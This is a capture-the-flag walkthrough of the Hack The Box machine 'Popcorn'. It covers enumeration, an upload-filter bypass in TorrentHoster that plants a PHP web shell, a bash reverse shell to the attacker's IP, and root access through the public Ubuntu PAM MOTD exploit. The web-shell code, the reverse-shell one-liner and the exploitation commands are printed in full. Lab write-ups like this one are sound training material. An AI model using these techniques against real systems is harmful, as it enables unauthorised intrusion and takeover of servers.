Popcorn @ hackthebox

Popcorn is relatively easy Linux machine although initial foothold is not very straightforward. You need to dig a bit to find it. Because this machine is running on a pretty old Ubuntu version, there are more then one way to escalate privileges.

Enumeration

First, lets start nmap

┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #nmap -sC -sT -oA nmap -n 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 20:39 CET
Nmap scan report for 10.10.10.6
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

Since on hackthebox simple credentials are not working for SSH and bruteforcing is not the way to go (we don’t even know the username), enumerating the web server seems like only way to go. Directory enumeration from directories will be done with gobuster. (https://github.com/OJ/gobuster)

┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://10.10.10.6/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/03/20 20:53:10 Starting gobuster
/index (Status: 200)
/test (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)
2019/03/20 20:59:31 Finished

Checking the directories found – /test reveals some information about the machine. This is definitely a valuable information

Popcorn @ hackthebox

Exploitation / Initial Foothold

The directory /torrent on the other hand seems to be hosting some torrent web portal.

Popcorn @ hackthebox

In the footer we can find following information:

Copyright © 2007 TorrentHoster.com. All rights reserved

If we search on google for torrenthoster we will surely find following page: https://packetstormsecurity.com/files/87275/Torrent-Hoster-XSS-Shell-Upload.html . According to this website, this “torrenthoster” has some upload vulnerabilities. All of them require authenticated access though.

As it seems we can create the user – simply sign up and log in with an newly created user.

There is an upload vulnerability

Popcorn @ hackthebox

We could try different file types, but they are not going to be uploaded. The application is actually doing some background checks on that file as well. As soon as the file will be uploaded, you will see some metadata about the torrent as well. We do have however another posibility uploading our code under the screenshots.

Popcorn @ hackthebox

If Burp (or some comparable alternative program) is not already running, we should start it in order to intercept upload and be able to change the header

Popcorn @ hackthebox

To switch proxies in the Firefox browser simple and quickly, i use FoxyProxy extension with following settings:

Popcorn @ hackthebox

Of course setting up FoxyProxy is not enough, you also have to make sure that your Burp is set to intercept and FoxyProxy is activated. Intercepting the jpg file first will make crafting the malicious PHP file later easier. We need to copy enough characters (bytes) to make the application believe that we are uploading an jpg. (You can read more about magic bytes here: https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/)

Popcorn @ hackthebox

We can send the HTTP Request to repeater, but is also going to be saved in Burp in the Target > Site map

Popcorn @ hackthebox

We can now upload our shell simply by pasting php code behind the magic bytes + some random bytes. I used very simple php code “<?php echo system($_REQUEST[‘cmd’]); ?>”. I also changed the file into cmd.jpg.php and content type into image/jpeg. This way we can bypass more than one upload block mechanism.

Popcorn @ hackthebox

I ran gobuster again in the http://10.10.10.6/torrent/ to crawl this directory , since we need to find an upload folder to run the script (and check if it was uploaded at all).

┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap]
└──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6/torrent -x php
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://10.10.10.6/torrent/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
2019/03/20 21:28:15 Starting gobuster
/images (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/rss (Status: 200)
/rss.php (Status: 200)
/login (Status: 200)
/login.php (Status: 200)
/templates (Status: 301)
/users (Status: 301)
/admin (Status: 301)
/health (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/css (Status: 301)
/edit (Status: 200)
/edit.php (Status: 200)
/lib (Status: 301)
/database (Status: 301)

We could have found the /upload folder just by guessing as well. Either way, our file was uploaded and it can be run.

Popcorn @ hackthebox

Code execution is successful. (see output from the command cmd=whoami). We can also change the Request method to POST to make the requests more readable and easier to modify

Popcorn @ hackthebox

Reverse shell command used: bash -i >& /dev/tcp/10.10.14.68/5555 0>&1

Popcorn @ hackthebox

Command can be encoded using CTRL+U (if using GET).

To check if attackers machine can be reached, we can run a ping, and start tcpdump with icmp filter

Popcorn @ hackthebox

Since ping is reaching the attackers (our) machine, we can try to get a shell now.

Popcorn @ hackthebox

We’ve got a shell, we should now upgrade the shell to fully interactive shell with CTRL+Z to background the process, stty raw -echo and typing fg (no output will be shown) and press enter

Popcorn @ hackthebox

Privilege Escalation

There are some credentials in /var/www/torrent/config.php. I couldn’t find anything useful in the database, Apart from the hash of the Admin user, which i couldn’t crack.

Popcorn @ hackthebox

I couldn’t find anything useful in the database, Apart from the hash of the Admin user, which i couldn’t crack. Connect to database with mysql -u torrent -D torrenthoster -p and type the SuperSecret!! password.

We can read the user flag.

www-data@popcorn:/var/www/torrent$ ls -la /home/george/
total 872
drwxr-xr-x 3 george george 4096 Mar 17 2017 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
-rw------- 1 root root 2769 May 5 2017 .bash_history
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw------- 1 root root 1571 Mar 17 2017 .mysql_history
-rw------- 1 root root 19 May 5 2017 .nano_history
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Mar 17 2017 user.txt
www-data@popcorn:/var/www/torrent$ cat /home/george/user.txt
*deleted*

I ran linenum scripts, but i couldn’t find anything on the first sight apart from the most obvious information – Machine is running a very old Ubuntu version. There is a high possibility that the it is vulnerable to dirtycow exploit (https://dirtycow.ninja/)

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"

I did however find an exploit simply by checking searchsploit/exploit-db for “ubuntu 9.10”. It has to do with MOTD (Message Of The Day) File Tampering. We can find MOTD in the .cache folder in /home/george/.cache/ so we know it is installed. (https://www.exploit-db.com/exploits/14339)

┌─[luka@parrot]─[~/Desktop/htb/Popcorn]
└──╼ $searchsploit ubuntu 9.10

Exploit Title | Path
| (/usr/share/exploitdb/)

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9 | exploits/linux/local/12130.py

Shellcodes: No Result
Papers: No Result

We can read the exploit using searchsploit -x 14339 and copy it from the location /usr/share/exploitdb/exploits/linux/local/14339.sh . I transfered the exploit to the Popcorn machine using wget.

Popcorn @ hackthebox
Popcorn @ hackthebox

If you copied this exploit like i did, you will definitely need to remove line endings with “sed -i ‘s/\r//’ 14339.sh” and make it executable with “chmod +x 14339.sh”

www-data@popcorn:/tmp$ chmod +x 14339.sh
www-data@popcorn:/tmp$ sed -i 's/\r//' 14339.sh
www-data@popcorn:/tmp$ bash 14339.sh
[] Ubuntu PAM MOTD local root [] SSH key set up
[] spawn ssh [+] owned: /etc/passwd [] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password:
root@popcorn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:/tmp# cat /root/root.txt
*deleted*

We’ve got an root access and we can read the flag.